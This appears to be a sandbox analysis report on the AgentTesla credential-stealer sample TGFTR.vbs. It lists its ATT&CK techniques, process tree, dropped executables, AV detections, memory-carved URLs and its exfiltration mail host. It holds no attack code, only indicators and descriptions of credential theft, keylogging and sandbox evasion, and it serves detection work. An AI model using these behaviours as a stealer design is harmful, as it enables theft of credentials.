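Both stages of the sample are flagged: anyname.exe for mail plus WinSCP, jNnIJrO.exe for all four categories. Chrome and Thunderbird reading their own stores are ignored by the allow-list, and the single powershell.exe read of profiles.ini stays below the threshold because it is one category from a system directory; it is recorded in the findings so an analyst can still see it. The threshold of two categories is what separates a stealer from a backup agent or a browser-profile migration tool, which typically stay within one.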

                      Remote Access Functionality:

Yara detected AgentTesla
Source: Yara match | File sources: the same 57 UNPACKEDPE, MEMORY and MEMORYSTR sources listed for this signature under Stealing of Sensitive Information above.

Mitre Att&ck Matrix

Digits appended to a technique name are the report's signature-count badges for that technique; empty cells are left blank.

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation 211 | Registry Run Keys / Startup Folder 1 | Process Injection 112 | Disable or Modify Tools 1 | OS Credential Dumping 2 | Account Discovery 1 | Remote Services | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scripting 221 | Boot or Logon Initialization Scripts | Registry Run Keys / Startup Folder 1 | Deobfuscate/Decode Files or Information 1 | Input Capture 11 | File and Directory Discovery 1 | Remote Desktop Protocol | Data from Local System 2 | Exfiltration Over Bluetooth | Non-Standard Port 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Exploitation for Client Execution 1 | Logon Script (Windows) | Logon Script (Windows) | Scripting 221 | Credentials in Registry 1 | System Information Discovery 114 | SMB/Windows Admin Shares | Email Collection 1 | Automated Exfiltration | Non-Application Layer Protocol 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 4 | NTDS | Query Registry 1 | Distributed Component Object Model | Input Capture 11 | Scheduled Transfer | Application Layer Protocol 11 | SIM Card Swap |  | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing 13 | LSA Secrets | Security Software Discovery 311 | SSH | Clipboard Data 1 | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Masquerading 1 | Cached Domain Credentials | Process Discovery 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion 131 | DCSync | Virtualization/Sandbox Evasion 131 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection 112 | Proc Filesystem | Application Window Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Hidden Files and Directories 1 | /etc/passwd and /etc/shadow | System Owner/User Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station |  | Data Destruction
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | Remote System Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols |  |  | Data Encrypted for Impact

                      Behavior Graph

Behavior Graph ID: 546894 | Sample: TGFTR.vbs | Start date: 01/01/2022 | Architecture: WINDOWS | Score: 100

Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; 6 other signatures.

Process tree as rendered in the graph (node numbers are the graph's own; "->" is a started-process edge):

[7] wscript.exe
    dropped: C:\Users\user\AppData\Local\...\anyname.exe (PE32)
    signatures: Benign windows process drops PE files; VBScript performs obfuscated calls to suspicious functions
    -> [15] anyname.exe
           signatures: Multi AV Scanner detection for dropped file; Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Machine Learning detection for dropped file; 2 other signatures
           -> [23] anyname.exe
                  network: mail.gnvmetalica.pe 162.241.148.206, ports 49799, 49800, 49803, UNIFIEDLAYER-AS-1US United States
                  dropped: C:\Users\user\AppData\Roaming\...\jNnIJrO.exe (PE32); C:\Users\user\AppData\...\tmpG259.tmp (copy) (PE32)
                  signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Hides that the sample has been downloaded from the Internet (zone.identifier); Installs a global keyboard hook
           -> [28] anyname.exe
           -> [30] anyname.exe
           -> [32] anyname.exe
[11] jNnIJrO.exe
    signatures: Injects a PE file into a foreign processes
    -> [18] jNnIJrO.exe
           network: mail.gnvmetalica.pe
           signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; 2 other signatures
[13] jNnIJrO.exe
    signatures: Multi AV Scanner detection for dropped file; Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Machine Learning detection for dropped file; Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
    -> [21] jNnIJrO.exe

                      Screenshots


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label
TGFTR.vbs | 40% | ReversingLabs | Script-WScript.Backdoor.Bladabhindi

                      Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | 100% | Joe Sandbox ML | (no label)
C:\Users\user\AppData\Local\Temp\anyname.exe | 100% | Joe Sandbox ML | (no label)
C:\Users\user\AppData\Local\Temp\anyname.exe | 32% | ReversingLabs | ByteCode-MSIL.Trojan.StealerPacker
C:\Users\user\AppData\Local\Temp\tmpG259.tmp (copy) | 32% | ReversingLabs | ByteCode-MSIL.Trojan.StealerPacker
C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | 32% | ReversingLabs | ByteCode-MSIL.Trojan.StealerPacker

                      Unpacked PE Files

Source | Detection | Scanner | Label
6.0.anyname.exe.400000.10.unpack | 100% | Avira | TR/Spy.Gen8
18.0.jNnIJrO.exe.400000.10.unpack | 100% | Avira | TR/Spy.Gen8
14.0.jNnIJrO.exe.400000.4.unpack | 100% | Avira | TR/Spy.Gen8
14.2.jNnIJrO.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8
14.0.jNnIJrO.exe.400000.6.unpack | 100% | Avira | TR/Spy.Gen8
6.2.anyname.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8
6.0.anyname.exe.400000.4.unpack | 100% | Avira | TR/Spy.Gen8
14.0.jNnIJrO.exe.400000.12.unpack | 100% | Avira | TR/Spy.Gen8
18.0.jNnIJrO.exe.400000.6.unpack | 100% | Avira | TR/Spy.Gen8
18.0.jNnIJrO.exe.400000.4.unpack | 100% | Avira | TR/Spy.Gen8
18.0.jNnIJrO.exe.400000.12.unpack | 100% | Avira | TR/Spy.Gen8
18.2.jNnIJrO.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8
6.0.anyname.exe.400000.8.unpack | 100% | Avira | TR/Spy.Gen8
18.0.jNnIJrO.exe.400000.8.unpack | 100% | Avira | TR/Spy.Gen8
14.0.jNnIJrO.exe.400000.10.unpack | 100% | Avira | TR/Spy.Gen8
14.0.jNnIJrO.exe.400000.8.unpack | 100% | Avira | TR/Spy.Gen8
6.0.anyname.exe.400000.12.unpack | 100% | Avira | TR/Spy.Gen8
6.0.anyname.exe.400000.6.unpack | 100% | Avira | TR/Spy.Gen8

                      Domains

                      No Antivirus matches

                      URLs

Every URL string found in memory scored 0% with its scanner. Most of the fontbureau / jiyu-kobo / founder / galapagosdesign entries, with their trailing junk characters, look like strings carved from font-file metadata mapped into anyname.exe (PID 1), not network activity; the report's Contacted Domains section below lists only mail.gnvmetalica.pe as actually reached.

Source | Detection | Scanner | Label
https://pZXqS7KWMFA4rh4s.net | 0% | Avira URL Cloud | safe
http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
http://www.fontbureau.comI.TTF | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.fontbureau.comcoma= | 0% | Avira URL Cloud | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.ascendercorp.com/typedesigners.html0 | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/2 | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp// | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/fi-fj | 0% | Avira URL Cloud | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/Y0 | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/jp/N | 0% | URL Reputation | safe
https://api.ipify.org%GETMozilla/5.0 | 0% | URL Reputation | safe
http://www.fontbureau.comrsiv | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/# | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
https://api.ipify.org% | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe
http://PGwAqe.com | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cnd | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/Y | 0% | URL Reputation | safe
http://www.galapagosdesign.com/ | 0% | URL Reputation | safe
http://DynDns.comDynDNS | 0% | URL Reputation | safe
http://www.fontbureau.comF | 0% | URL Reputation | safe
http://www.fontbureau.comcomd | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/N | 0% | URL Reputation | safe
http://mail.gnvmetalica.pe | 0% | Avira URL Cloud | safe
http://www.fontbureau.commom | 0% | Avira URL Cloud | safe
http://www.fontbureau.comdc | 0% | Avira URL Cloud | safe
http://www.fontbureau.coma= | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/jp/ | 0% | URL Reputation | safe
http://www.fontbureau.comd | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.fontbureau.coma2 | 0% | Avira URL Cloud | safe
https://pZXqS7KWMFA4rh4s.net$ | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/u | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/Y0/ | 0% | URL Reputation | safe
http://www.founder.com.cn/cn9 | 0% | URL Reputation | safe
http://www.fontbureau.comld | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.fontbureau.como | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/%7 | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/j | 0% | URL Reputation | safe
http://www.fontbureau.comalic | 0% | URL Reputation | safe
http://www.fontbureau.comgrita= | 0% | Avira URL Cloud | safe
http://www.fontbureau.comitud | 0% | URL Reputation | safe
http://www.fontbureau.comFj | 0% | Avira URL Cloud | safe

                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
mail.gnvmetalica.pe | 162.241.148.206 | true | false | none | high

The "Malicious: false" and "high" reputation values are a lookup on the host, not a verdict on this sample's traffic: the behavior graph ties every connection to this host to the processes flagged for credential theft and the global keyboard hook, so the host should be treated as this sample's exfiltration endpoint regardless of its reputation score.

                        URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://pZXqS7KWMFA4rh4s.net | jNnIJrO.exe, 00000012.00000002.824325494.00000000030E1000.00000004.00000001.sdmp, jNnIJrO.exe, 00000012.00000002.825746785.000000000343E000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/frere-jones.htmlh)7 | anyname.exe, 00000001.00000003.306522725.0000000005384000.00000004.00000001.sdmp | false | none | high
http://127.0.0.1:HTTP/1.1 | anyname.exe, 00000006.00000002.823366416.0000000002DD1000.00000004.00000001.sdmp, jNnIJrO.exe, 0000000E.00000002.439216232.0000000002FE1000.00000004.00000001.sdmp, jNnIJrO.exe, 00000012.00000002.824325494.00000000030E1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://www.fontbureau.com/designersG | anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmp | false | none | high
http://www.fontbureau.comI.TTF | anyname.exe, 00000001.00000003.307218412.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307110201.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307170119.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307135343.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307270002.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307071537.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307193624.0000000005385000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/? | anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmp | false | none | high
http://www.founder.com.cn/cn/bThe | anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmp | false | none | high
http://www.fontbureau.com/designers/frere-jones.html. | anyname.exe, 00000001.00000003.306522725.0000000005384000.00000004.00000001.sdmp | false | none | high
http://www.tiro.com | anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.comcoma= | anyname.exe, 00000001.00000003.306557310.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306216816.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306488948.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306339731.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306416301.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306908381.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306247274.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306384385.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306974365.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306447674.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306522725.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306584518.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306611590.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306185319.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306281192.0000000005384000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://www.fontbureau.com/designers | anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmp | false | none | high
http://www.goodfont.co.kr | anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.301360086.0000000005392000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn/cThe | anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.ascendercorp.com/typedesigners.html0 | anyname.exe, 00000001.00000003.304640191.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304726542.0000000005393000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.jiyu-kobo.co.jp/2 | anyname.exe, 00000001.00000003.303718023.0000000005381000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304640191.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304813720.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304505516.0000000005383000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304121443.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304726542.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304198095.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304778818.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304527460.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304377221.000000000537D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304034173.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304864654.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.303741179.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304002699.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.303924115.0000000005392000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304187285.0000000005391000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304449883.0000000005381000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304310308.0000000005393000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp// | anyname.exe, 00000001.00000003.303718023.0000000005381000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304640191.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304505516.0000000005383000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304121443.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304198095.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304527460.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304377221.000000000537D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304034173.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.303741179.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304002699.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.303924115.0000000005392000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304187285.0000000005391000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304449883.0000000005381000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304310308.0000000005393000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/fi-fj | anyname.exe, 00000001.00000003.304121443.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304034173.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304002699.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.303924115.0000000005392000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/ | anyname.exe, 00000001.00000003.307705902.0000000005373000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307218412.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307110201.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307047335.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307170119.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307135343.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307270002.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307012712.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307071537.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307193624.0000000005385000.00000004.00000001.sdmp | false | none | high
http://www.galapagosdesign.com/DPlease | anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/Y0 | anyname.exe, 00000001.00000003.304640191.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304813720.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304505516.0000000005383000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304726542.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304198095.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304778818.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304527460.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304377221.000000000537D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304864654.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304187285.0000000005391000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304449883.0000000005381000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304310308.0000000005393000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/jp/N | anyname.exe, 00000001.00000003.304640191.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304813720.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304505516.0000000005383000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304726542.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304778818.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304935196.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304527460.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304377221.000000000537D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.305193401.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304864654.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304993341.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.305244460.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.305125471.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304449883.0000000005381000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.305058733.0000000005393000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://api.ipify.org%GETMozilla/5.0 | jNnIJrO.exe, 00000012.00000002.824325494.00000000030E1000.00000004.00000001.sdmp | false | URL Reputation: safe | low
http://www.fontbureau.comrsiv | anyname.exe, 00000001.00000003.307270002.0000000005385000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fonts.com | anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmp | false | none | high
http://www.sandoll.co.kr | anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/# | anyname.exe, 00000001.00000003.304640191.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304505516.0000000005383000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304121443.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304198095.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304527460.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304377221.000000000537D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304187285.0000000005391000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304449883.0000000005381000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304310308.0000000005393000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sakkal.com | anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304620293.0000000005383000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://api.ipify.org% | anyname.exe, 00000006.00000002.823366416.0000000002DD1000.00000004.00000001.sdmp, jNnIJrO.exe, 00000012.00000002.824325494.00000000030E1000.00000004.00000001.sdmp | false | URL Reputation: safe | low
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | anyname.exe, 00000001.00000002.339301678.0000000003449000.00000004.00000001.sdmp, anyname.exe, 00000006.00000002.818827980.0000000000402000.00000040.00000001.sdmp, anyname.exe, 00000006.00000000.333358376.0000000000402000.00000040.00000001.sdmp, jNnIJrO.exe, 0000000A.00000002.421939439.0000000003C69000.00000004.00000001.sdmp, jNnIJrO.exe, 0000000E.00000002.437781088.0000000000402000.00000040.00000001.sdmp, jNnIJrO.exe, 0000000E.00000000.412466130.0000000000402000.00000040.00000001.sdmp, jNnIJrO.exe, 00000010.00000002.437858484.0000000003819000.00000004.00000001.sdmp, jNnIJrO.exe, 00000012.00000000.432184199.0000000000402000.00000040.00000001.sdmp, jNnIJrO.exe, 00000012.00000000.429637125.0000000000402000.00000040.00000001.sdmp | false | URL Reputation: safe | unknown
http://PGwAqe.com | jNnIJrO.exe, 00000012.00000002.824325494.00000000030E1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/u | anyname.exe, 00000001.00000003.306557310.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306216816.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306488948.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306339731.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306416301.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306158695.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306247274.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306384385.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306125466.0000000005380000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306447674.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306522725.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306584518.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306611590.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306185319.0000000005384000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.306281192.0000000005384000.00000004.00000001.sdmp | false | none | high
http://www.founder.com.cn/cnd | anyname.exe, 00000001.00000003.302877241.0000000005372000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/Y | anyname.exe, 00000001.00000003.304640191.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304505516.0000000005383000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304527460.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304377221.000000000537D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304449883.0000000005381000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.303350130.0000000005389000.00000004.00000001.sdmp | false | none | high
